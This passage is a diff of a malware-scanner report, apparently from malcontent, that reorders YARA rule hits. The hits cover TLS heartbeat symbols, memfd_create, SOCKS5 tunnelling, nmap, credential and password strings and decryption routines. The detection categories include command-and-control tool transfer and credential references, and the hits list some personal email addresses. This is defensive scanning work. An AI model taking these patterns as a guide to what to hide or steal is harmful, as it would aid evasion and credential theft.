[orkziTLSziExtension_zdfExtensionHeartBeat2_info](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat2_info&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat_closure](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat_closure&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeatzuzdcext](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeatzuzdcext&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [2_NetworkziTLSziExtension_decodeHeartBeat_closure](https://github.com/search?q=2_NetworkziTLSziExtension_decodeHeartBeat_closure&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat1_closur](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat1_closur&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat2_closur](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat2_closur&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode1_cl](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode1_cl&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode2_cl](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode2_cl&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode3_by](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode3_by&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeatMode_clo](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeatMode_clo&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat_closure](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat_closure&type=code)
[72_NetworkziTLSziExtension_zdfEqHeartBeatMode_clo](https://github.com/search?q=72_NetworkziTLSziExtension_zdfEqHeartBeatMode_clo&type=code)
[72_NetworkziTLSziExtension_zdfEqHeartBeat_closure](https://github.com/search?q=72_NetworkziTLSziExtension_zdfEqHeartBeat_closure&type=code)
[72_NetworkziTLSziStruct_zdbEIDzuHeartbeat1_closur](https://github.com/search?q=72_NetworkziTLSziStruct_zdbEIDzuHeartbeat1_closur&type=code)
[72_NetworkziTLSziStruct_zdbEIDzuHeartbeat_closure](https://github.com/search?q=72_NetworkziTLSziStruct_zdbEIDzuHeartbeat_closure&type=code)
[72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_closure](https://github.com/search?q=72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_closure&type=code)
[8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerAl](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerAl&type=code)
[8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerNo](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdbHeartBeatzuPeerNo&type=code)
[8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerAl](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerAl&type=code)
[8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerNo](https://github.com/search?q=8f72_NetworkziTLSziExtension_zdmHeartBeatzuPeerNo&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat1_closur](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat1_closur&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode1_cl](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode1_cl&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode1_in](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode1_in&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode2_cl](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode2_cl&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode3_cl](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode3_cl&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatMode_clo](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatMode_clo&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatModezuzd](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatModezuzd&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat_closure](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat_closure&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeatzuzdcsho](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeatzuzdcsho&type=code)
[_NetworkziTLSziExtension_zdfldZCHeartBeatModeZCfr](https://github.com/search?q=_NetworkziTLSziExtension_zdfldZCHeartBeatModeZCfr&type=code)
[f72_NetworkziTLSziExtension_fromHeartBeatMode1_cl](https://github.com/search?q=f72_NetworkziTLSziExtension_fromHeartBeatMode1_cl&type=code)
[f72_NetworkziTLSziExtension_fromHeartBeatMode1_in](https://github.com/search?q=f72_NetworkziTLSziExtension_fromHeartBeatMode1_in&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeat1_closur](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeat1_closur&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeatMode1_cl](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeatMode1_cl&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeatMode2_by](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeatMode2_by&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeatMode_clo](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeatMode_clo&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeat_closure](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeat_closure&type=code)
[nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_clo](https://github.com/search?q=nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_clo&type=code)
[nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_inf](https://github.com/search?q=nsion_zdfldZCHeartBeatModeZCfromHeartBeatMode_inf&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat1_closur](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat1_closur&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat2_closur](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat2_closur&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat_closure](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat_closure&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeatzuzdcext](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeatzuzdcext&type=code)
[2_NetworkziTLSziExtension_zdtczqHeartBeat3_bytes](https://github.com/search?q=2_NetworkziTLSziExtension_zdtczqHeartBeat3_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat2_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat2_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat3_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat3_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat4_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat4_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat5_bytes](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat5_bytes&type=code)
[f72_NetworkziTLSziExtension_zdtcHeartBeat2_bytes](https://github.com/search?q=f72_NetworkziTLSziExtension_zdtcHeartBeat2_bytes&type=code)
[_NetworkziTLSziExtension_zdfShowHeartBeat1_info](https://github.com/search?q=_NetworkziTLSziExtension_zdfShowHeartBeat1_info&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat1_info](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat1_info&type=code)
[orkziTLSziExtension_zdfExtensionHeartBeat2_info](https://github.com/search?q=orkziTLSziExtension_zdfExtensionHeartBeat2_info&type=code)
[2_NetworkziTLSziExtension_decodeHeartBeat_info](https://github.com/search?q=2_NetworkziTLSziExtension_decodeHeartBeat_info&type=code)
[72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_info](https://github.com/search?q=72_NetworkziTLSziStruct_zdmEIDzuHeartbeat_info&type=code)
[extensionDecode: HeartBeat](https://github.com/search?q=extensionDecode%3A+HeartBeat&type=code)
[HeartBeat_PeerAll](https://github.com/search?q=HeartBeat_PeerAll&type=code)
[HeartBeat_PeerNot](https://github.com/search?q=HeartBeat_PeerNot&type=code)
[heartbeat](https://github.com/search?q=heartbeat&type=code) | | MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | -| MEDIUM | [net/email/exotic_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/exotic_addr.yara#exotic_email_addr) | Contains an exotic email address | [bastianholst@gmx.de](https://github.com/search?q=bastianholst%40gmx.de&type=code)
[chris_hormann@gmx.de](https://github.com/search?q=chris_hormann%40gmx.de&type=code)
[langstefan@gmx.at](https://github.com/search?q=langstefan%40gmx.at&type=code)
[views@gmx.de](https://github.com/search?q=views%40gmx.de&type=code)
[zerokode@gmx.net](https://github.com/search?q=zerokode%40gmx.net&type=code) | -| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [Accept](https://github.com/search?q=Accept&type=code)
[application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code) | -| MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
[HTTP_COOKIE](https://github.com/search?q=HTTP_COOKIE&type=code)
[http_cookie](https://github.com/search?q=http_cookie&type=code) | -| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [POST](https://github.com/search?q=POST&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[post](https://github.com/search?q=post&type=code) | +| MEDIUM | [net/email/exotic_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/exotic_addr.yara#exotic_email_addr) | Contains an exotic email address | [chris_hormann@gmx.de](https://github.com/search?q=chris_hormann%40gmx.de&type=code)
[bastianholst@gmx.de](https://github.com/search?q=bastianholst%40gmx.de&type=code)
[langstefan@gmx.at](https://github.com/search?q=langstefan%40gmx.at&type=code)
[zerokode@gmx.net](https://github.com/search?q=zerokode%40gmx.net&type=code)
[views@gmx.de](https://github.com/search?q=views%40gmx.de&type=code) | +| MEDIUM | [net/http/accept](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/accept.yara#http_accept_binary) | accepts binary files via HTTP | [application/octet-stream](https://github.com/search?q=application%2Foctet-stream&type=code)
[Accept](https://github.com/search?q=Accept&type=code) | +| MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [HTTP_COOKIE](https://github.com/search?q=HTTP_COOKIE&type=code)
[http_cookie](https://github.com/search?q=http_cookie&type=code)
[Cookie](https://github.com/search?q=Cookie&type=code) | +| MEDIUM | [net/http/form_upload](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/form-upload.yara#http_form_upload) | upload content via HTTP form | [application/x-www-form-urlencoded](https://github.com/search?q=application%2Fx-www-form-urlencoded&type=code)
[application/json](https://github.com/search?q=application%2Fjson&type=code)
[POST](https://github.com/search?q=POST&type=code)
[post](https://github.com/search?q=post&type=code) | | MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [Content-Type: text/x](https://github.com/search?q=Content-Type%3A+text%2Fx&type=code)
[HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | | MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [QWebSocketCorsAuthenticator](https://github.com/search?q=QWebSocketCorsAuthenticator&type=code)
[QWebSocketHandshakeOptions](https://github.com/search?q=QWebSocketHandshakeOptions&type=code)
[QWebSocketServer](https://github.com/search?q=QWebSocketServer&type=code)
[WebSockets](https://github.com/search?q=WebSockets&type=code) | | MEDIUM | [net/ip/byte_order](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-byte-order.yara#htonl) | convert values between host and network byte order | [htonl](https://github.com/search?q=htonl&type=code)
[htons](https://github.com/search?q=htons&type=code)
[ntohs](https://github.com/search?q=ntohs&type=code) | @@ -65,7 +65,7 @@ | MEDIUM | [net/ip/spoof](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/spoof.yara#spoof) | references spoofing | [Spoofchecker](https://github.com/search?q=Spoofchecker&type=code)
[spoofchecker](https://github.com/search?q=spoofchecker&type=code) | | MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code)
[inet_ntop](https://github.com/search?q=inet_ntop&type=code) | | MEDIUM | [net/proxy/socks5](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/socks5.yara#socks5) | Supports SOCK5 proxies | [.Socks5](https://github.com/search?q=.Socks5&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[socks5](https://github.com/search?q=socks5&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code)
[Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[proxy](https://github.com/search?q=proxy&type=code) | | MEDIUM | [net/rpc/ntlm](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/rpc/ntlm.yara#windows_ntlm_auth) | supports Windows NTLM authentication | [NTLM](https://github.com/search?q=NTLM&type=code)
[ntlm](https://github.com/search?q=ntlm&type=code) | | MEDIUM | [net/socket/connect](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-connect.yara#connect) | [initiate a connection on a socket](https://linux.die.net/man/3/connect) | [connect](https://github.com/search?q=connect&type=code) | | MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | @@ -85,13 +85,13 @@ | MEDIUM | [sec-tool/net/nmap](https://github.com/chainguard-dev/malcontent/blob/main/rules/sec-tool/net/nmap.yara#nmap) | nmap (network map) port scanner | [nmap](https://github.com/search?q=nmap&type=code) | | MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept](https://github.com/search?q=intercept&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscatedFont](https://github.com/search?q=obfuscatedFont&type=code)
[obfuscates](https://github.com/search?q=obfuscates&type=code) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [amd64](https://github.com/search?q=amd64&type=code)
[http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ADDefaultDomainPasswordPolicy](https://github.com/search?q=ADDefaultDomainPasswordPolicy&type=code)
[ADFineGrainedPasswordPolicySubject](https://github.com/search?q=ADFineGrainedPasswordPolicySubject&type=code)
[ADServiceAccountPassword](https://github.com/search?q=ADServiceAccountPassword&type=code)
[ADUserResultantPasswordPolicy](https://github.com/search?q=ADUserResultantPasswordPolicy&type=code)
[AuthLDAPBindPassword](https://github.com/search?q=AuthLDAPBindPassword&type=code)
[BadPassword_con_info](https://github.com/search?q=BadPassword_con_info&type=code)
[BasicPasswordFieldUI](https://github.com/search?q=BasicPasswordFieldUI&type=code)
[ComputerMachinePassword](https://github.com/search?q=ComputerMachinePassword&type=code)
[JPasswordField](https://github.com/search?q=JPasswordField&type=code)
[PasswordAuthentication](https://github.com/search?q=PasswordAuthentication&type=code)
[PasswordCallback](https://github.com/search?q=PasswordCallback&type=code)
[PasswordCredential](https://github.com/search?q=PasswordCredential&type=code)
[PasswordProtection](https://github.com/search?q=PasswordProtection&type=code)
[PasswordView](https://github.com/search?q=PasswordView&type=code)
[Set-ADAccountPassword](https://github.com/search?q=Set-ADAccountPassword&type=code)
[addefaultdomainpasswordpolicy](https://github.com/search?q=addefaultdomainpasswordpolicy&type=code)
[adfinegrainedpasswordpolicysubject](https://github.com/search?q=adfinegrainedpasswordpolicysubject&type=code)
[adserviceaccountpassword](https://github.com/search?q=adserviceaccountpassword&type=code)
[aduserresultantpasswordpolicy](https://github.com/search?q=aduserresultantpasswordpolicy&type=code)
[authldapbindpassword](https://github.com/search?q=authldapbindpassword&type=code)
[computermachinepassword](https://github.com/search?q=computermachinepassword&type=code)
[curle_bad_password_entered](https://github.com/search?q=curle_bad_password_entered&type=code)
[curle_ftp_user_password_incorrect](https://github.com/search?q=curle_ftp_user_password_incorrect&type=code)
[curlssh_auth_password](https://github.com/search?q=curlssh_auth_password&type=code)
[dont_store_passwords](https://github.com/search?q=dont_store_passwords&type=code)
[fbsql_database_password](https://github.com/search?q=fbsql_database_password&type=code)
[fbsql_password](https://github.com/search?q=fbsql_password&type=code)
[fbsql_set_password](https://github.com/search?q=fbsql_set_password&type=code)
[groupPassword](https://github.com/search?q=groupPassword&type=code)
[init_with_password](https://github.com/search?q=init_with_password&type=code)
[ldap_control_passwordpolicyrequest](https://github.com/search?q=ldap_control_passwordpolicyrequest&type=code)
[ldap_control_passwordpolicyresponse](https://github.com/search?q=ldap_control_passwordpolicyresponse&type=code)
[newt_flag_password](https://github.com/search?q=newt_flag_password&type=code)
[oci_password_change](https://github.com/search?q=oci_password_change&type=code)
[param_default_password](https://github.com/search?q=param_default_password&type=code)
[password for entry](https://github.com/search?q=password+for+entry&type=code)
[password_bcrypt](https://github.com/search?q=password_bcrypt&type=code)
[password_default](https://github.com/search?q=password_default&type=code)
[password_field_tag](https://github.com/search?q=password_field_tag&type=code)
[password_get_info](https://github.com/search?q=password_get_info&type=code)
[password_grace_time](https://github.com/search?q=password_grace_time&type=code)
[password_hash](https://github.com/search?q=password_hash&type=code)
[password_life_time](https://github.com/search?q=password_life_time&type=code)
[password_lock_time](https://github.com/search?q=password_lock_time&type=code)
[password_needs_rehash](https://github.com/search?q=password_needs_rehash&type=code)
[password_reuse_max](https://github.com/search?q=password_reuse_max&type=code)
[password_reuse_time](https://github.com/search?q=password_reuse_time&type=code)
[password_verify_function](https://github.com/search?q=password_verify_function&type=code)
[proxy_tlsauth_password](https://github.com/search?q=proxy_tlsauth_password&type=code)
[radius_chap_password](https://github.com/search?q=radius_chap_password&type=code)
[radius_user_password](https://github.com/search?q=radius_user_password&type=code)
[sam_password](https://github.com/search?q=sam_password&type=code)
[set-adaccountpassword](https://github.com/search?q=set-adaccountpassword&type=code)
[swftextfield_password](https://github.com/search?q=swftextfield_password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[zdtczqBadPassword_closure](https://github.com/search?q=zdtczqBadPassword_closure&type=code) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ldap_control_passwordpolicyresponse](https://github.com/search?q=ldap_control_passwordpolicyresponse&type=code)
[ADFineGrainedPasswordPolicySubject](https://github.com/search?q=ADFineGrainedPasswordPolicySubject&type=code)
[adfinegrainedpasswordpolicysubject](https://github.com/search?q=adfinegrainedpasswordpolicysubject&type=code)
[ldap_control_passwordpolicyrequest](https://github.com/search?q=ldap_control_passwordpolicyrequest&type=code)
[curle_ftp_user_password_incorrect](https://github.com/search?q=curle_ftp_user_password_incorrect&type=code)
[ADDefaultDomainPasswordPolicy](https://github.com/search?q=ADDefaultDomainPasswordPolicy&type=code)
[ADUserResultantPasswordPolicy](https://github.com/search?q=ADUserResultantPasswordPolicy&type=code)
[addefaultdomainpasswordpolicy](https://github.com/search?q=addefaultdomainpasswordpolicy&type=code)
[aduserresultantpasswordpolicy](https://github.com/search?q=aduserresultantpasswordpolicy&type=code)
[curle_bad_password_entered](https://github.com/search?q=curle_bad_password_entered&type=code)
[zdtczqBadPassword_closure](https://github.com/search?q=zdtczqBadPassword_closure&type=code)
[ADServiceAccountPassword](https://github.com/search?q=ADServiceAccountPassword&type=code)
[adserviceaccountpassword](https://github.com/search?q=adserviceaccountpassword&type=code)
[password_verify_function](https://github.com/search?q=password_verify_function&type=code)
[ComputerMachinePassword](https://github.com/search?q=ComputerMachinePassword&type=code)
[computermachinepassword](https://github.com/search?q=computermachinepassword&type=code)
[fbsql_database_password](https://github.com/search?q=fbsql_database_password&type=code)
[PasswordAuthentication](https://github.com/search?q=PasswordAuthentication&type=code)
[param_default_password](https://github.com/search?q=param_default_password&type=code)
[proxy_tlsauth_password](https://github.com/search?q=proxy_tlsauth_password&type=code)
[Set-ADAccountPassword](https://github.com/search?q=Set-ADAccountPassword&type=code)
[curlssh_auth_password](https://github.com/search?q=curlssh_auth_password&type=code)
[password_needs_rehash](https://github.com/search?q=password_needs_rehash&type=code)
[set-adaccountpassword](https://github.com/search?q=set-adaccountpassword&type=code)
[swftextfield_password](https://github.com/search?q=swftextfield_password&type=code)
[AuthLDAPBindPassword](https://github.com/search?q=AuthLDAPBindPassword&type=code)
[BadPassword_con_info](https://github.com/search?q=BadPassword_con_info&type=code)
[BasicPasswordFieldUI](https://github.com/search?q=BasicPasswordFieldUI&type=code)
[authldapbindpassword](https://github.com/search?q=authldapbindpassword&type=code)
[dont_store_passwords](https://github.com/search?q=dont_store_passwords&type=code)
[radius_chap_password](https://github.com/search?q=radius_chap_password&type=code)
[radius_user_password](https://github.com/search?q=radius_user_password&type=code)
[oci_password_change](https://github.com/search?q=oci_password_change&type=code)
[password_grace_time](https://github.com/search?q=password_grace_time&type=code)
[password_reuse_time](https://github.com/search?q=password_reuse_time&type=code)
[PasswordCredential](https://github.com/search?q=PasswordCredential&type=code)
[PasswordProtection](https://github.com/search?q=PasswordProtection&type=code)
[fbsql_set_password](https://github.com/search?q=fbsql_set_password&type=code)
[init_with_password](https://github.com/search?q=init_with_password&type=code)
[newt_flag_password](https://github.com/search?q=newt_flag_password&type=code)
[password for entry](https://github.com/search?q=password+for+entry&type=code)
[password_field_tag](https://github.com/search?q=password_field_tag&type=code)
[password_life_time](https://github.com/search?q=password_life_time&type=code)
[password_lock_time](https://github.com/search?q=password_lock_time&type=code)
[password_reuse_max](https://github.com/search?q=password_reuse_max&type=code)
[password_get_info](https://github.com/search?q=password_get_info&type=code)
[PasswordCallback](https://github.com/search?q=PasswordCallback&type=code)
[password_default](https://github.com/search?q=password_default&type=code)
[password_bcrypt](https://github.com/search?q=password_bcrypt&type=code)
[JPasswordField](https://github.com/search?q=JPasswordField&type=code)
[fbsql_password](https://github.com/search?q=fbsql_password&type=code)
[groupPassword](https://github.com/search?q=groupPassword&type=code)
[password_hash](https://github.com/search?q=password_hash&type=code)
[PasswordView](https://github.com/search?q=PasswordView&type=code)
[sam_password](https://github.com/search?q=sam_password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code) | | LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privatekey](https://github.com/search?q=privatekey&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[aes_256_cbc](https://github.com/search?q=aes_256_cbc&type=code)
[aes_encrypt](https://github.com/search?q=aes_encrypt&type=code) | -| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [28AES128zuzdcxtsDecrypt_closure](https://github.com/search?q=28AES128zuzdcxtsDecrypt_closure&type=code)
[28AES128zuzdcxtsDecrypt_info](https://github.com/search?q=28AES128zuzdcxtsDecrypt_info&type=code)
[28AES192zuzdcxtsDecrypt_closure](https://github.com/search?q=28AES192zuzdcxtsDecrypt_closure&type=code)
[28AES192zuzdcxtsDecrypt_info](https://github.com/search?q=28AES192zuzdcxtsDecrypt_info&type=code)
[28AES256zuzdcxtsDecrypt_closure](https://github.com/search?q=28AES256zuzdcxtsDecrypt_closure&type=code)
[28AES256zuzdcxtsDecrypt_info](https://github.com/search?q=28AES256zuzdcxtsDecrypt_info&type=code)
[Primitive_zdwccmDecrypt_closure](https://github.com/search?q=Primitive_zdwccmDecrypt_closure&type=code)
[Primitive_zdwccmDecrypt_info](https://github.com/search?q=Primitive_zdwccmDecrypt_info&type=code)
[TLSziCipher_BulkDecrypt_closure](https://github.com/search?q=TLSziCipher_BulkDecrypt_closure&type=code)
[TLSziCipher_BulkDecrypt_con_info](https://github.com/search?q=TLSziCipher_BulkDecrypt_con_info&type=code)
[TypesziAEAD_aeadDecrypt_closure](https://github.com/search?q=TypesziAEAD_aeadDecrypt_closure&type=code)
[TypesziAEAD_aeadDecrypt_info](https://github.com/search?q=TypesziAEAD_aeadDecrypt_info&type=code)
[TypesziBlock_cbcDecryptGeneric_closure](https://github.com/search?q=TypesziBlock_cbcDecryptGeneric_closure&type=code)
[TypesziBlock_cbcDecryptGeneric_info](https://github.com/search?q=TypesziBlock_cbcDecryptGeneric_info&type=code)
[TypesziBlock_cbcDecrypt_closure](https://github.com/search?q=TypesziBlock_cbcDecrypt_closure&type=code)
[TypesziBlock_cbcDecrypt_info](https://github.com/search?q=TypesziBlock_cbcDecrypt_info&type=code)
[TypesziBlock_cfbDecryptGeneric_closure](https://github.com/search?q=TypesziBlock_cfbDecryptGeneric_closure&type=code)
[TypesziBlock_cfbDecryptGeneric_info](https://github.com/search?q=TypesziBlock_cfbDecryptGeneric_info&type=code)
[TypesziBlock_cfbDecrypt_closure](https://github.com/search?q=TypesziBlock_cfbDecrypt_closure&type=code)
[TypesziBlock_cfbDecrypt_info](https://github.com/search?q=TypesziBlock_cfbDecrypt_info&type=code)
[TypesziBlock_ecbDecrypt_closure](https://github.com/search?q=TypesziBlock_ecbDecrypt_closure&type=code)
[TypesziBlock_ecbDecrypt_info](https://github.com/search?q=TypesziBlock_ecbDecrypt_info&type=code)
[TypesziBlock_xtsDecryptGeneric_closure](https://github.com/search?q=TypesziBlock_xtsDecryptGeneric_closure&type=code)
[TypesziBlock_xtsDecryptGeneric_info](https://github.com/search?q=TypesziBlock_xtsDecryptGeneric_info&type=code)
[TypesziBlock_xtsDecrypt_closure](https://github.com/search?q=TypesziBlock_xtsDecrypt_closure&type=code)
[TypesziBlock_xtsDecrypt_info](https://github.com/search?q=TypesziBlock_xtsDecrypt_info&type=code)
[deImplZCaeadImplDecrypt_closure](https://github.com/search?q=deImplZCaeadImplDecrypt_closure&type=code)
[deImplZCaeadImplDecrypt_info](https://github.com/search?q=deImplZCaeadImplDecrypt_info&type=code)
[edentialsFindForDecrypting_closure](https://github.com/search?q=edentialsFindForDecrypting_closure&type=code)
[edentialsFindForDecrypting_info](https://github.com/search?q=edentialsFindForDecrypting_info&type=code)
[edentialsFindForDecryptingzugo1_closure](https://github.com/search?q=edentialsFindForDecryptingzugo1_closure&type=code)
